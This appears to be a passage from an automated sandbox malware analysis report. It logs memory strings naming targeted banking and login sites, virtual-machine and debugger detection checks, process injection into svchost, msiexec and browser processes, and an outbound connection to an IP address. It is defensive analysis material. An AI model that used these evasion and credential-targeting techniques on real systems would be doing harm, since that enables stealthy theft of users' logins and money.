                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: dwVrTdy.exe, 00000009.00000003.2123332787.000001B9CE48C000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE48C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - COM.HKVMware20,11696501413
                      Source: AzVRM7c.exe, 0000000B.00000002.2223576684.000002E2774AD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW'g
                      Source: explorer.exe, 00000014.00000000.2202639819.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000o;
                      Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
                      Source: be08f59021.exe, 00000016.00000003.2961780018.00000000055A1000.00000004.00000020.00020000.00000000.sdmp, be08f59021.exe, 00000016.00000003.2836146510.00000000055A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWIT1o
                      Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTbrVMWare
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - HKVMware20,11696501413]
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696501413j
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                      Source: explorer.exe, 00000014.00000000.2212795940.0000000006F94000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000094DC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: %SystemRoot%\system32\mswsock.dlldRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                      Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: explorer.exe, 00000014.00000000.2204496366.0000000002FA0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                      Source: skotes.exe, skotes.exe, 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696501413x
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.comVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696501413|UE
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696501413x
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696501413h
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413}
                      Source: explorer.exe, 00000014.00000000.2216466843.00000000093B4000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: 2VMware Virtual USB MouseJC:\Windows\System32\DDORes.dll,-2212
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696501413x
                      Source: firefox.exe, 0000002B.00000002.2484555408.000002392C0F9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: t5abhIx.exe, 0000000D.00000002.2203502992.0000026D64626000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW{z
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696501413s
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696501413t
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2668885421.0000000001403000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllx
                      Source: explorer.exe, 00000014.00000000.2202639819.00000000008DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000/;
                      Source: explorer.exe, 00000014.00000000.2217813962.00000000095E9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696501413t
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.comVMware20,11696501413}
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - EU WestVMware20,11696501413n
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696501413u
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactiveuserers.co.inVMware20,11696501413d
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696501413
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
                      Source: file.exe, 00000000.00000002.1351208390.000000000042D000.00000040.00000001.01000000.00000003.sdmp, skotes.exe, 00000002.00000002.1385379192.000000000119D000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000003.00000002.1391236924.000000000119D000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                      Source: dwVrTdy.exe, 00000009.00000002.2166451879.000001B9CE3F6000.00000004.00000020.00020000.00000000.sdmp, dwVrTdy.exe, 0000000A.00000002.2183914279.000001CDE2AD8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.0000000004587000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696501413o
                      Source: FBFF.tmp.fcxcx.exe, 00000026.00000002.2687072362.000000000426B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696501413f
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10021
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10000
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10038
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_2-10056
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-9999
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-10055
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-10020
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeAPI call chain: ExitProcess graph end nodegraph_3-10037
                      Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeThread information set: HideFromDebuggerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeThread information set: HideFromDebugger
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: regmonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: gbdyllo
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: procmon_window_class
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: ollydbg
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: filemonclass
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: NTICE
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: SICE
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeFile opened: SIWVID
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess queried: DebugPortJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014440001\be08f59021.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                      Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\1014442001\d8d3046b98.exeProcess queried: DebugPort
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_04A70DA1 rdtsc 0_2_04A70DA1
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F636EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF643F636EC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F62348 GetLastError,IsDebuggerPresent,OutputDebugStringW,9_2_00007FF643F62348
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0027652B mov eax, dword ptr fs:[00000030h]0_2_0027652B
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0027A302 mov eax, dword ptr fs:[00000030h]0_2_0027A302
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FEA302 mov eax, dword ptr fs:[00000030h]2_2_00FEA302
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 2_2_00FE652B mov eax, dword ptr fs:[00000030h]2_2_00FE652B
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FEA302 mov eax, dword ptr fs:[00000030h]3_2_00FEA302
                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 3_2_00FE652B mov eax, dword ptr fs:[00000030h]3_2_00FE652B
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F81EF8 GetProcessHeap,9_2_00007FF643F81EF8
                      Source: C:\Windows\System32\svchost.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: Debug
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F636EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF643F636EC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F62798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,9_2_00007FF643F62798
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F638CC SetUnhandledExceptionFilter,9_2_00007FF643F638CC
                      Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeCode function: 9_2_00007FF643F6CA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,9_2_00007FF643F6CA44
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845A36EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF6845A36EC
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845A2798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_00007FF6845A2798
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845A38CC SetUnhandledExceptionFilter,11_2_00007FF6845A38CC
                      Source: C:\Users\user\AppData\Local\Temp\1014431001\AzVRM7c.exeCode function: 11_2_00007FF6845ACA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_00007FF6845ACA44
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4E3EC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00007FF711D4E3EC
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4E6D0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF711D4E6D0
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D5364C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,12_2_00007FF711D5364C
                      Source: C:\Program Files\Windows Media Player\graph\graph.exeCode function: 12_2_00007FF711D4E8B0 SetUnhandledExceptionFilter,12_2_00007FF711D4E8B0
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDACA44 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF61DDACA44
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDA36EC IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,13_2_00007FF61DDA36EC
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDA38CC SetUnhandledExceptionFilter,13_2_00007FF61DDA38CC
                      Source: C:\Users\user\AppData\Local\Temp\1014432001\t5abhIx.exeCode function: 13_2_00007FF61DDA2798 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,13_2_00007FF61DDA2798
                      Source: C:\Users\user\AppData\Local\Temp\FBFF.tmp.fcxcx.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeFile created: FBFF.tmp.fcxcx.exe.20.drJump to dropped file
                      Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80
                      Source: C:\Windows\explorer.exeDomain query: support.mozilla.org
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\1014439001\u1w30Wt.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Program Files\Mozilla Firefox\firefox.exe base: 2392C270000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1A2636C0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1AD70400000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 20DDD3C0000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory allocated: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe base: 1E494510000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF6BCBD0000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7DF220000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Roaming\2DB3A69DE7692371543510\2DB3A69DE7692371543510.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF6DAB80000 protect: page execute and read and write
                      Source: C:\Windows\explorer.exeMemory protected: C:\Program Files\Mozilla Firefox\firefox.exe base: 144AA0F0000 protect: page execute read
